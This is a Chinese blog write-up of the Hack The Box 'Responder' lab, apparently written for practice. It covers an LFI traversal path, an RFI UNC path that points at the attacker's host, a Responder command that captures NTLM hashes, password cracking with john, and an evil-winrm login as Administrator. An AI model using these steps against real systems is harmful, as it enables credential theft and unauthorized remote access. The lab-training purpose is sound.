HTB-Responder

HTB-Responder

1.TASK1

KT7CdbPWAjOUmWviIvCPCkuZ3D14WIK00TrPvx5FtDs

问题:使用 IP 地址访问 Web 服务时,我们要重定向到的域是什么?

li5thvKj9jk-OnOZ211lQkp4Er9X_14bf348VTXBoVs

答案:unika.htb

2.TASK2

JhvBT7Js0_JCvj03JsIP3lXdERp5QpN9VyjkVk3DR-c

由于网站无法打开,需要在/etc/hosts里把域名加入

hn7IIY7qoOIhYYiwLfEnm-0GfdVtMAIdCRMcNeqvjJI

注意这里得用root帐号修改,否则无法修改

修改完成后可正常打开

QcE-7Qur-IvB-67Cak78Vpn-cGuKu1Mbf8BOC7aZ-nM

用Wappalyzer插件可以发现是PHP

VeBbFI9wsIiuPdpQQHzXHJaG4DHpZgBUKhAY6TwiTDc

或者可以用BP抓包发现,这里不做演示

3.TASK3

ob_l0-5sJHBzBHgVU-yC-dXbHMRIG-mI7NAJaBFfcuQ

问题:用于加载不同语言版本网页的 URL 参数的名称是什么?

当我们更改网站语言时,url上会显示page参数,将页面传入。说明此处可能存在文件包含漏洞

pdRATYl4wx003U4jc_RiXTTbogmg3jNdxsGJu7gnDnY

N5NHxGtvB9hpRsc0umCX6VAAxiKzjVO12MP-7Mef-cY

答案:page

4.TASK4

u14zN4VUr7z_20-7XRka8FOLOw1Zgupes8QcwJSZn1k

问题:page参数的以下哪个值是利用本地文件包含 (LFI) 漏洞的示例:“french.html”、“//10.10.14.6/somefile”、“../../. ./../../../../../windows/system32/drivers/etc/hosts”, “minikatz.exe”

N8r2tPopQaHSmxbJGNQG9ShnEDRP9ZV4irDGPA-3obM

答案:../../. ./../../../../../windows/system32/drivers/etc/hosts

5.TASK5

Lr-4KD0ElqUM2ogsY3mwB9tNLO_mlHWsR87CBUko5tw

问题:page参数的以下哪个值是利用远程文件包含 (RFI) 漏洞的示例:“french.html”、“//10.10.14.6/somefile”、“../../. ./../../../../../windows/system32/drivers/etc/hosts”, “minikatz.exe”

文件包含是指程序开发人员一般会把重复使用的函数写到单个文件中,需要使用某个函数时直接调用此文件,而无需再次编写,这种文件调用的过程一般被称为文件包含。

本地文件包含: 被包含的文件在服务器本地

远程文件包含: 被包含的文件在第三方服务器

文件包含漏洞: 通过函数包含文件时,由于没有对包含的文件名进行有效的过滤处理,被攻击者利用从而导致了包含了Web根目录以外的文件进来,导致文件信息的泄露甚至注入了恶意代码

答案: //10.10.14.6/somefile

6.TASK6

qMb3sex6jpARoOIYk0kZo9d6PP9pBEaZnrFj6OZzz88

问题:NTLM 代表什么?

答案:New Technology LAN Manager

7.TASK7

6gHkqfdvq61_xv_qFIjr-ObmRKyJr09zVOv-tzwXie0

问题:我们在 Responder 实用程序中使用哪个标志来指定网络接口?

答案:-I

8.TASK8

02fgvBPG1hnaZj4mmKo_JSwKrFIvVIfiRdSS7Ojp7zA

问题:有几种工具可以接受 NetNTLMv2 质询/响应并尝试数百万个密码,以查看它们中的任何一个是否生成相同的响应。一种这样的工具通常被称为“john”,但全名是什么?

答案:john the ripper

9.TASK9

bmCZM7tufntkPZTt3797Psu6M_EDeVg9lKeGTUzKiFY

问题:管理员用户的密码是什么?

首先启动responder并监听本地的tun0网卡,然后由于靶机存在RFI,因此可以远程访问本地的某个文件,使用responder拿到主机的administrator的哈希,然后使用john破解

使用responder监听本地tun0网卡

sudo responder -I tun0

根据题目给出的远程文件//10.10.14.6/somefile,把地址改为自己机器的地址,进行访问

QXqVhNuSSrbruZCcygXkx98V3CQyTkvkFgd_hNmsVNk

得到一串hash值

AYydrEglrUY_cTGwF7W8O--SXgYJHRI3AK5JN7nqqyM

使用john工具进行破解

BZ578QE8ZZmBJjKBnSdPbd5AAfjFH0UkdSpTH6AkF9w

答案:badminton

PS:花了22分钟也是醉了。。

10.TASK10

n4C546dTJ8CmSQFn_cEq5fBs3SSe805yQ0BP1qGRANM

问题:我们将使用 Windows 服务(即在盒子上运行)使用我们恢复的密码远程访问 Responder 机器。它侦听的 TCP 端口是什么?

WinRM(Windows Remote Management)windows远程管理,这个是基于powershell的功能

检测 WinRM 是否可用的最简单方法是查看端口是否打开, 如果这两个端口有一个打开:

5985/tcp (HTTP)

5986/tcp (HTTPS)

说明WinRM已配置,可以尝试进入远程会话

答案:5985

11.SUBMIT FLAG

使用evil-winrm对目标进行连接

evil-winrm -i 10.129.125.204 -u Administrator -p badminton

连接成功

使用dir可以查看当前目录下存在哪些文件

使用cd .. 返回上一级目录

e_n6rwKsA81G_51Y0QjEAWcSJ7eyaeAiineSyoxdUqU

最后在mike的Desktop目录下找到flag文件

cXPn2eb8oD9qd7TX4MReasuAzkuV16xmrbbSJDs2inc

cCAkm_xBSiYWrdgl9fUpYlot5lyt2tIzHCU5dtRwNE4

posted on 2024-04-03 16:48  跳河离去的鱼  阅读(58)  评论(0编辑  收藏  举报